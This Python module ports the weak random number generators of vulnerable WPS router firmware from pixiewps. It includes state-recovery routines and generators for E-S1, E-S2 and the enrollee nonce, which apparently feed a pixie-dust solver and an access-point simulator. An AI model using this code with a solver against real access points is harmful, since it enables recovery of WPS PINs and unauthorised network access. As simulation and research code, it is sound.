"""The weak PRNGs used by vulnerable WPS implementations.

Every function here is a line-by-line port of the corresponding code in
pixiewps (https://github.com/wiire-a/pixiewps, GPL-3.0), which is the
reference for the offline pixie-dust attack and is what reaver shells out
to.  The functions operate on explicit state values (no hidden globals)
so they can be used both by the solver and by the AP simulator.

Modes (pixiewps numbering):

* ``RT`` (1)        — Ralink/MediaTek/CloudEngine: 32-bit LFSR
* ``ECOS_SIMPLE`` (2) — Broadcom eCos LCG (23-bit outputs)
* ``RTL819x`` (3)   — Realtek: glibc legacy ``srand``/``rand`` model
* ``ECOS_SIMPLEST`` (4) — eCos LCG, full 32-bit output
* ``ECOS_KNUTH`` (5)  — Minstd (Knuth) LCG
"""

from __future__ import annotations

import struct
from typing import Iterable, Optional

__all__ = [
    "RT", "ECOS_SIMPLE", "RTL819x", "ECOS_SIMPLEST", "ECOS_KNUTH",
    "MODE_NAMES",
    "ralink_forward_byte",
    "ralink_restore_byte",
    "ralink_backward_byte",
    "ralink_bytes_forward",
    "ralink_restore_state",
    "glibc_lehmer_step",
    "glibc_fast_seed",
    "glibc_fast_nonce",
    "rtl_nonce_fill",
    "ecos_rand_simplest",
    "ecos_rand_simple",
    "ecos_rand_knuth",
    "prng_nonce_and_es",
]

# pixiewps mode constants
NONE = 0
RT = 1
ECOS_SIMPLE = 2
RTL819x = 3
ECOS_SIMPLEST = 4
ECOS_KNUTH = 5

MODE_NAMES = {
    NONE: "none",
    RT: "rt",
    ECOS_SIMPLE: "ecos-simple",
    RTL819x: "rtl819x",
    ECOS_SIMPLEST: "ecos-simplest",
    ECOS_KNUTH: "ecos-knuth",
}

MASK32 = 0xFFFFFFFF
RALINK_TAP = 0x80000057

# ---------------------------------------------------------------------------
# RT — Ralink LFSR
# ---------------------------------------------------------------------------


def ralink_forward_byte(state: int) -> tuple[int, int]:
    """Generate one byte with the forward LFSR.  Returns (byte, new_state).

    Port of ``ralink_randbyte()``.
    """
    state &= MASK32
    r = 0
    for _ in range(8):
        if state & 1:
            state = ((state ^ RALINK_TAP) >> 1) | 0x80000000
            r = (r << 1) | 1
        else:
            state >>= 1
            r = (r << 1)
        state &= MASK32
    return r, state


def ralink_backward_byte(state: int) -> tuple[int, int]:
    """One step of the reverse-direction LFSR.  Returns (byte, new_state).

    Port of ``ralink_randbyte_backwards()``.  This advances the state
    *backwards* through the forward orbit (it is the unique preimage map
    of the forward transition).
    """
    state &= MASK32
    r = 0
    for i in range(8):
        if state & 0x80000000:
            state = ((state << 1) ^ RALINK_TAP) | 1
            r |= 1 << i
        else:
            state <<= 1
        state &= MASK32
    return r, state


def ralink_restore_byte(state: int, byte: int) -> int:
    """Reverse one generated byte from the state.  Returns new_state.

    Port of ``ralink_randstate_restore()`` (bits consumed LSB-first).
    """
    state &= MASK32
    r = byte & 0xFF
    for _ in range(8):
        result = r & 1
        r >>= 1
        if result:
            state = ((state << 1) ^ RALINK_TAP) | 1
        else:
            state = state << 1
        state &= MASK32
    return state


def ralink_bytes_forward(state: int, count: int = 16) -> bytes:
    """Generate ``count`` bytes forward.  Returns (bytes, final_state)."""
    out = bytearray()
    for _ in range(count):
        b, state = ralink_forward_byte(state)
        out.append(b)
    return bytes(out), state


def ralink_restore_state(nonce: bytes) -> int:
    """Rebuild the LFSR state from a 16-byte nonce (C-code flow).

    Port of the sequence::

        struct ralink_randstate prng = {0};
        for (int i = WPS_NONCE_LEN; i--; )
            ralink_randstate_restore(&prng, wps->e_nonce[i]);
    """
    if len(nonce) != 16:
        raise ValueError("nonce must be 16 bytes")
    state = 0
    for i in range(15, -1, -1):
        state = ralink_restore_byte(state, nonce[i])
    return state


# ---------------------------------------------------------------------------
# RTL819x — glibc legacy rand() model
# ---------------------------------------------------------------------------
#
# pixiewps' "fast" glibc model (src/random/glibc_random_yura.c):
# the 34-entry table is glibc's internal seed table; each "rand()" step
# advances a Lehmer (Park-Miller) 16807/2**31-1 counter and accumulates
# seed*tbl[j] into 32-bit words (which overflow mod 2**32).

GLIBC_SEED_TBL = (
    0x0128E83B, 0x00DAFA31, 0x009F4828, 0x00F66443, 0x00BEE24D, 0x00817005,
    0x00CB918F, 0x00A64845, 0x0069C3CF, 0x00A76DBD, 0x0090A848, 0x0057025F,
    0x0089126C, 0x007D9A8F, 0x0048252A, 0x006FB2D4, 0x006CCC15, 0x003C5744,
    0x005A998F, 0x005DF917, 0x0032ED77, 0x00492688, 0x0050E901, 0x002B5F57,
    0x003ACD0B, 0x00456B7A, 0x0025413D, 0x002F11F4, 0x003B564D, 0x00203F14,
    0x002589FC, 0x003283F8, 0x001C17E4, 0x001DD823,
)
assert len(GLIBC_SEED_TBL) == 34

_LEHMER_MOD = 0x7FFFFFFF


def glibc_lehmer_step(seed: int) -> int:
    """seed = (16807 * seed) mod (2**31 - 1), exactly as in the C code.

    The C reduction is a two-pass base-2**31 digit sum (mod 2**31-1).  It
    differs from a plain ``% 0x7FFFFFFF`` in exactly one case: the
    2**31-1 fixed point, which the C code leaves unchanged — replicated
    here for fidelity.
    """
    seed &= MASK32
    p = 16807 * seed
    p = (p >> 31) + (p & _LEHMER_MOD)
    p = (p >> 31) + (p & _LEHMER_MOD)
    return p & MASK32


def glibc_fast_seed(seed: int) -> int:
    """First "rand()" value for a given glibc seed.

    Port of ``glibc_fast_seed()`` (30 table terms j=3..32, then T[33] with
    the final seed step).  Equals the big-endian first word of
    ``glibc_fast_nonce(seed)``.
    """
    word0 = 0
    s = seed & MASK32
    for j in range(3, 33):
        word0 = (word0 + s * GLIBC_SEED_TBL[j]) & MASK32
        s = glibc_lehmer_step(s)
    word0 = (word0 + s * GLIBC_SEED_TBL[33]) & MASK32
    return word0 >> 1


def glibc_fast_nonce(seed: int) -> bytes:
    """Next four "rand()" values as a 16-byte big-endian nonce.

    Port of ``glibc_fast_nonce()`` (dest[i] = word_i >> 1, big-endian).
    ``glibc_fast_nonce(seed)[0:4]`` is the big-endian encoding of
    ``glibc_fast_seed(seed)`` — an internal consistency property that the
    test-suite asserts.
    """
    word0 = word1 = word2 = word3 = 0
    s = seed & MASK32
    for j in range(31):
        word0 += s * GLIBC_SEED_TBL[j + 3]
        word1 += s * GLIBC_SEED_TBL[j + 2]
        word2 += s * GLIBC_SEED_TBL[j + 1]
        word3 += s * GLIBC_SEED_TBL[j + 0]
        s = glibc_lehmer_step(s)
    return struct.pack(
        ">IIII",
        (word0 & MASK32) >> 1,
        (word1 & MASK32) >> 1,
        (word2 & MASK32) >> 1,
        (word3 & MASK32) >> 1,
    )


def rtl_nonce_fill(seed: int) -> bytes:
    """16-byte nonce for an RTL819x seed (== ``glibc_fast_nonce``)."""
    return glibc_fast_nonce(seed)


# ---------------------------------------------------------------------------
# eCos PRNGs (Broadcom)
# ---------------------------------------------------------------------------


def ecos_rand_simplest(seed: int) -> tuple[int, int]:
    """32-bit LCG, full state as output.  Returns (value, new_seed)."""
    seed = (seed * 1103515245 + 12345) & MASK32
    return seed, seed


def ecos_rand_simple(seed: int) -> tuple[int, int]:
    """3 LCG steps per call, 23-bit mixed output.  Returns (value, new_seed)."""
    s = seed & MASK32
    s = (s * 1103515245 + 12345) & MASK32
    uret = s & 0xFFE00000
    s = (s * 1103515245 + 12345) & MASK32
    uret += (s & 0xFFFC0000) >> 11
    s = (s * 1103515245 + 12345) & MASK32
    uret += (s & 0xFE000000) >> 25
    return uret & MASK32, s


def ecos_rand_knuth(seed: int) -> int:
    """Minstd (Knuth) LCG.  Returns new_seed (value == new_seed)."""
    MM, AA, QQ, RR = 2147483647, 48271, 44488, 3399
    seed = AA * (seed % QQ) - RR * (seed // QQ)
    if seed < 0:
        seed += MM
    return seed & MASK32


# ---------------------------------------------------------------------------
# Composite generators (used by the simulator and the solver)
# ---------------------------------------------------------------------------


def _prng_bytes(mode: int, seed: int, count: int) -> tuple[bytes, int]:
    """Generate ``count`` bytes with the given PRNG.  (bytes, final_state)"""
    out = bytearray()
    s = seed
    if mode == RT:
        for _ in range(count):
            b, s = ralink_forward_byte(s)
            out.append(b)
    elif mode == ECOS_SIMPLE:
        for _ in range(count):
            v, s = ecos_rand_simple(s)
            out.append(v & 0xFF)
    elif mode == ECOS_SIMPLEST:
        for _ in range(count):
            v, s = ecos_rand_simplest(s)
            out.append(v & 0xFF)
    elif mode == ECOS_KNUTH:
        for _ in range(count):
            s = ecos_rand_knuth(s)
            out.append(s & 0xFF)
    elif mode == RTL819x:
        raise ValueError("RTL819x nonces are 4-word glibc blocks, not bytes")
    else:
        raise ValueError(f"unknown mode {mode}")
    return bytes(out), s


def prng_nonce_and_es(mode: int, seed: int) -> tuple[bytes, bytes, bytes, dict]:
    """Generate (E-S1, E-S2, E-Nonce) the way vulnerable firmware does.

    Returns ``(es1, es2, enonce, seeds)`` where ``seeds`` records seed
    information relative to ``seed`` (useful for tests and for the
    solver's RTL819x distance search).

    Stream order per mode (matching the solver's reconstruction):

    * ``RT``:          E-S1 (16) -> E-S2 (16) -> E-Nonce (16), forward LFSR
      (the solver rebuilds the state from the nonce, then steps *back*
      through E-S2 and E-S1).
    * ``ECOS_SIMPLE``: the Broadcom quirk — E-Nonce[0] holds the *top 7
      bits of the seed* (uptime seconds, in the low 7 bits of the byte;
      bit 7 stays 0), E-Nonce[1..15] are 15 stream outputs, then
      E-S1 (16) and E-S2 (16).  This is exactly the model implied by the
      C solver: ``known = e_nonce[0] << 25; seed = known | counter``
      with a 2^25 counter scan only reconstructs the seed when those
      7 bits are the seed's top 7 bits.  The solver recovers them and
      scans the remaining 25 bits.
    * ``ECOS_SIMPLEST`` / ``ECOS_KNUTH``: E-Nonce (16) -> E-S1 (16)
      -> E-S2 (16) plain stream.
    * ``RTL819x``:     E-Nonce  = glibc block at ``seed``
                       E-S1     = glibc block at ``seed`` (dist 0)
                       E-S2     = glibc block at ``seed + 3`` (within the
                       solver's forward window of 10)
    """
    if mode == RT:
        es1, s = ralink_bytes_forward(seed, 16)
        es2, s = ralink_bytes_forward(s, 16)
        enonce, s = ralink_bytes_forward(s, 16)
        return es1, es2, enonce, {"es1": 0, "es2": 16, "nonce": 32}

    if mode == RTL819x:
        es1 = glibc_fast_nonce(seed)          # s1_seed = seed (dist 0)
        es2 = glibc_fast_nonce(seed + 3)      # s2_seed = seed + 3 (<= 10)
        enonce = glibc_fast_nonce(seed)
        return es1, es2, enonce, {"es1": 0, "es2": 3, "nonce": 0}

    if mode == ECOS_SIMPLE:
        enonce = bytearray(16)
        # firmware leaks the seed's top 7 bits in the low 7 nonce bits
        enonce[0] = (seed >> 25) & 0x7F
        s = seed
        for i in range(1, 16):
            v, s = ecos_rand_simple(s)
            enonce[i] = v & 0xFF
        es1, s = _prng_bytes(mode, s, 16)
        es2, _s = _prng_bytes(mode, s, 16)
        return es1, es2, bytes(enonce), {"es1": 0, "es2": 1, "nonce": 1}

    # ECOS_SIMPLEST / ECOS_KNUTH: plain forward stream
    enonce, s = _prng_bytes(mode, seed, 16)
    es1, s = _prng_bytes(mode, s, 16)
    es2, _s = _prng_bytes(mode, s, 16)
    return es1, es2, enonce, {"es1": 1, "es2": 2, "nonce": 0}
